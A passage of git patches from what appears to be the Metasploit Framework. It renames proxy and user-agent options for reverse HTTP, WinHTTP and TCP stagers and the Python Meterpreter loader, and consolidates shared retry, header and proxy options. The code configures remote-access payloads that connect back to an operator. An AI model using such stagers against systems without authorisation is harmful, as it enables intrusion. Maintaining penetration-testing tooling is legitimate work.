OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) + OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)'), + OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries']), + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), + OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), + OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), + OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), + OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']) ]) end @@ -67,4 +66,3 @@ module Payload::Multi::ReverseHttp end end - diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 370e28dc51..0b8c97210b 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -88,9 +88,9 @@ module Payload::Python::MeterpreterLoader end met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'") - http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent'] - http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST'] - http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT'] + http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent'] + http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST'] + http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT'] http_header_host = opts[:header_host] || ds['HttpHeaderHost'] http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie'] http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer'] diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 8f133d034d..9dac5a71cd 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -13,8 +13,8 @@ module Payload::Python::ReverseHttp super(info) register_options( [ - OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]), - OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]), + OptString.new('HttpProxyHost', [ false, "The proxy server's IP address" ], aliases: ['PayloadProxyHost']), + OptPort.new('HttpProxyPort', [ true, "The proxy port to connect to", 8080 ], aliases: ['PayloadProxyHost']), OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) @@ -29,9 +29,9 @@ module Payload::Python::ReverseHttp opts.merge!({ host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - user_agent: ds['MeterpreterUserAgent'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + user_agent: ds['HttpUserAgent'], header_host: ds['HttpHeaderHost'], header_cookie: ds['HttpHeaderCookie'], header_referer: ds['HttpHeaderReferer'] diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 3c9972c0cf..284347e1cb 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -60,12 +60,12 @@ module Msf::Payload::TransportConfig lhost: opts[:lhost] || ds['LHOST'], lport: (opts[:lport] || ds['LPORT']).to_i, uri: uri, - ua: ds['MeterpreterUserAgent'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - proxy_type: ds['PayloadProxyType'], - proxy_user: ds['PayloadProxyUser'], - proxy_pass: ds['PayloadProxyPass'], + ua: ds['HttpUserAgent'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + proxy_type: ds['HttpProxyType'], + proxy_user: ds['HttpProxyUser'], + proxy_pass: ds['HttpProxyPass'], custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 5ee674b3ac..3d6729b199 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -32,14 +32,14 @@ module Payload::Windows::ReverseHttp OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], aliases: ['ReverseConnectRetries']), OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), + OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), + OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), + OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), + OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), + OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') ], self.class) end @@ -60,12 +60,12 @@ module Payload::Windows::ReverseHttp if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index f30dbefa15..380a3141da 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -21,7 +21,7 @@ module Payload::Windows::ReverseWinHttp def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end @@ -41,13 +41,13 @@ module Payload::Windows::ReverseWinHttp conf[:uri] = luri + generate_uri conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:retry_count] = ds['StagerRetryCount'] - conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:proxy_ie] = ds['HttpProxyIE'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index 4821709236..4182e80e31 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb @@ -32,14 +32,14 @@ module Payload::Windows::ReverseHttp_x64 OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], aliases: ['ReverseConnectRetries']), OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), + OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), + OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), + OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), + OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), + OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') ], self.class) end @@ -65,12 +65,12 @@ module Payload::Windows::ReverseHttp_x64 if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 358115e464..419946be1e 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb @@ -22,7 +22,7 @@ module Payload::Windows::ReverseWinHttp_x64 def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end @@ -42,13 +42,13 @@ module Payload::Windows::ReverseWinHttp_x64 conf[:uri] = luri + generate_uri conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:retry_count] = ds['StagerRetryCount'] - conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:proxy_ie] = ds['HttpProxyIE'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index 766c741332..ba77689d2a 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -80,8 +80,8 @@ module MetasploitModule p[i, u.length] = u # patch proxy info - proxyhost = datastore['PayloadProxyHost'].to_s - proxyport = datastore['PayloadProxyPort'].to_s || "8080" + proxyhost = datastore['HttpProxyHost'].to_s + proxyport = datastore['HttpProxyPort'].to_s || "8080" if Rex::Socket.is_ipv6?(proxyhost) proxyhost = "[#{proxyhost}]" @@ -91,7 +91,7 @@ module MetasploitModule if proxyport == "80" proxyinfo = proxyhost end - if datastore['PayloadProxyType'].to_s == 'HTTP' + if datastore['HttpProxyType'].to_s == 'HTTP' proxyinfo = 'http://' + proxyinfo else #socks proxyinfo = 'socks=' + proxyinfo @@ -105,22 +105,22 @@ module MetasploitModule p[proxyloc-4] = [calloffset].pack('V')[0] # Authentication credentials have not been specified - if datastore['PayloadProxyUser'].to_s == '' or - datastore['PayloadProxyPass'].to_s == '' or - datastore['PayloadProxyType'].to_s == 'SOCKS' + if datastore['HttpProxyUser'].to_s == '' || + datastore['HttpProxyPass'].to_s == '' || + datastore['HttpProxyType'].to_s == 'SOCKS' jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START") # Remove the authentication code p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "") else - username_size_diff = 14 - datastore['PayloadProxyUser'].to_s.length - password_size_diff = 14 - datastore['PayloadProxyPass'].to_s.length + username_size_diff = 14 - datastore['HttpProxyUser'].to_s.length + password_size_diff = 14 - datastore['HttpProxyPass'].to_s.length jmp_offset = 16 + # PROXY_AUTH_START length 15 + # PROXY_AUTH_STOP length - username_size_diff + # Difference between datastore PayloadProxyUser length and db "PayloadProxyUser length" - password_size_diff # Same with PayloadProxyPass + username_size_diff + # Difference between datastore HttpProxyUser length and db "HttpProxyUser length" + password_size_diff # Same with HttpProxyPass # Patch call offset username_loc = p.index("PROXY_USERNAME") @@ -131,8 +131,8 @@ module MetasploitModule # Remove markers & change login/password p = p.gsub("PROXY_AUTH_START","") p = p.gsub("PROXY_AUTH_STOP","") - p = p.gsub("PROXY_USERNAME", datastore['PayloadProxyUser'].to_s) - p = p.gsub("PROXY_PASSWORD", datastore['PayloadProxyPass'].to_s) + p = p.gsub("PROXY_USERNAME", datastore['HttpProxyUser'].to_s) + p = p.gsub("PROXY_PASSWORD", datastore['HttpProxyPass'].to_s) end # Patch jmp dbl_get_server_host From 2076db2d6170515e6ed107fd7d9198f3016a7cc2 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 02:38:17 -0500 Subject: [PATCH 175/254] DRY up common stager and payload http and retry options --- lib/msf/core/handler/reverse_tcp.rb | 12 +--- lib/msf/core/opt.rb | 67 ++++++++++++++++++- lib/msf/core/payload/android/reverse_http.rb | 6 +- lib/msf/core/payload/java/reverse_http.rb | 14 ++-- lib/msf/core/payload/multi/reverse_http.rb | 15 ++--- .../core/payload/python/meterpreter_loader.rb | 21 ++++-- lib/msf/core/payload/python/reverse_http.rb | 12 ++-- lib/msf/core/payload/python/reverse_tcp.rb | 6 +- .../core/payload/python/reverse_tcp_ssl.rb | 6 +- lib/msf/core/payload/windows/reverse_http.rb | 20 ++---- .../core/payload/windows/x64/reverse_http.rb | 20 ++---- 11 files changed, 114 insertions(+), 85 deletions(-) diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index d938d46934..2cba8cf02a 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,15 +45,6 @@ module ReverseTcp # XXX: Not supported by all modules register_advanced_options( [ - OptInt.new( - 'StagerRetryCount', - [ true, 'The number of connection attempts to try before exiting the process', 10 ], - aliases: ['ReverseConnectRetries'] - ), - OptFloat.new( - 'StagerRetryWait', - [ false, 'Number of seconds to wait for the stager between reconnect attempts', 5.0 ] - ), OptAddress.new( 'ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system' ] @@ -62,7 +53,8 @@ module ReverseTcp 'ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false ] ) - ], + ] + + Msf::Opt::stager_retry_options, Msf::Handler::ReverseTcp ) diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3d622aff72..3009710a1e 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -59,12 +59,77 @@ module Msf # @return [OptEnum] def self.SSLVersion - Msf::OptEnum.new('SSLVersion', + Msf::OptEnum.new( + 'SSLVersion', 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', enums: self.ssl_supported_options ) end + def self.stager_retry_options + [ + OptInt.new( + 'StagerRetryCount', + 'The number of times the stager should retry if the first connect fails', + default: 10, + aliases: ['ReverseConnectRetries'] + ), + OptInt.new( + 'StagerRetryWait', + 'Number of seconds to wait for the stager between reconnect attempts', + default: 5 + ) + ] + end + + def self.http_proxy_options + [ + OptString.new( + 'HttpProxyHost', + 'An optional proxy server IP address or hostname', + aliases: ['PayloadProxyHost'] + ), + OptPort.new( + 'HttpProxyPort', + 'An optional proxy server port', + aliases: ['PayloadProxyPort'] + ), + OptString.new( + 'HttpProxyUser', + 'An optional proxy server username', + aliases: ['PayloadProxyUser'] + ), + OptString.new( + 'HttpProxyPass', + 'An optional proxy server password', + aliases: ['PayloadProxyPass'] + ), + OptEnum.new( + 'HttpProxyType', + 'The type of HTTP proxy', + enums: ['HTTP', 'SOCKS'], + aliases: ['PayloadProxyType'] + ) + ] + end + + def self.http_header_options + [ + OptString.new( + 'HttpHeaderHost', + 'An optional value to use for the Host HTTP header' + ), + OptString.new( + 'HttpHeaderCookie', + 'An optional value to use for the Cookie HTTP header' + ), + OptString.new( + 'HttpHeaderReferer', + 'An optional value to use for the Referer HTTP header' + ) + ] + end + CHOST = CHOST() CPORT = CPORT() LHOST = LHOST() diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb index e75e4618a3..88777d355e 100644 --- a/lib/msf/core/payload/android/reverse_http.rb +++ b/lib/msf/core/payload/android/reverse_http.rb @@ -23,11 +23,7 @@ module Payload::Android::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options(Msf::Opt::http_header_options) end # diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index b0c1fc0d66..297184e92d 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -23,13 +23,13 @@ module Payload::Java::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']), - ]) + register_advanced_options( + [ + OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), + OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), + ] + + Msf::Opt::http_header_options + ) end # diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb index 9d9f45de1c..1acb8f94e1 100644 --- a/lib/msf/core/payload/multi/reverse_http.rb +++ b/lib/msf/core/payload/multi/reverse_http.rb @@ -22,15 +22,12 @@ module Payload::Multi::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)'), - OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries']), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']) - ]) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 0b8c97210b..7f4935bc4b 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -28,13 +28,20 @@ module Payload::Python::MeterpreterLoader 'Stager' => {'Payload' => ""} )) - register_advanced_options([ - OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]), - OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options( + [ + OptBool.new( + 'MeterpreterTryToFork', + 'Fork a new process if the functionality is available', + default: true + ), + OptBool.new( + 'PythonMeterpreterDebug', + 'Enable debugging for the Python meterpreter' + ), + ] + + Msf::Opt::http_header_options + ) end def stage_payload(opts={}) diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 9dac5a71cd..30a0e34fe3 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -11,14 +11,10 @@ module Payload::Python::ReverseHttp def initialize(info = {}) super(info) - register_options( - [ - OptString.new('HttpProxyHost', [ false, "The proxy server's IP address" ], aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', [ true, "The proxy port to connect to", 8080 ], aliases: ['PayloadProxyHost']), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options( + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 8369602654..77481ecbb3 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb @@ -18,11 +18,7 @@ module Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index ee65afe0ab..b1fcecdde7 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -17,11 +17,7 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 3d6729b199..c5895d9f2a 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -27,20 +27,12 @@ module Payload::Windows::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), - OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), - OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index 4182e80e31..f31cf1ca24 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb @@ -27,20 +27,12 @@ module Payload::Windows::ReverseHttp_x64 # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), - OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), - OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end def transport_config(opts={}) From 37ab771ca9d2fbc24c55da443cbb8ead997a161d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 03:02:13 -0500 Subject: [PATCH 176/254] uri is not always defined, fix python stager generation --- .../core/payload/python/meterpreter_loader.rb | 42 ++++++++++--------- 1 file changed, 22 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 7f4935bc4b..11cb72d6c7 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -105,28 +105,30 @@ module Payload::Python::MeterpreterLoader # The callback URL can be different to the one that we're receiving from the interface # so we need to generate it # TODO: move this to somewhere more common so that it can be used across payload types - uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}" - callback_url = [ - opts[:url].split(':')[0], - '://', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, - ':', - 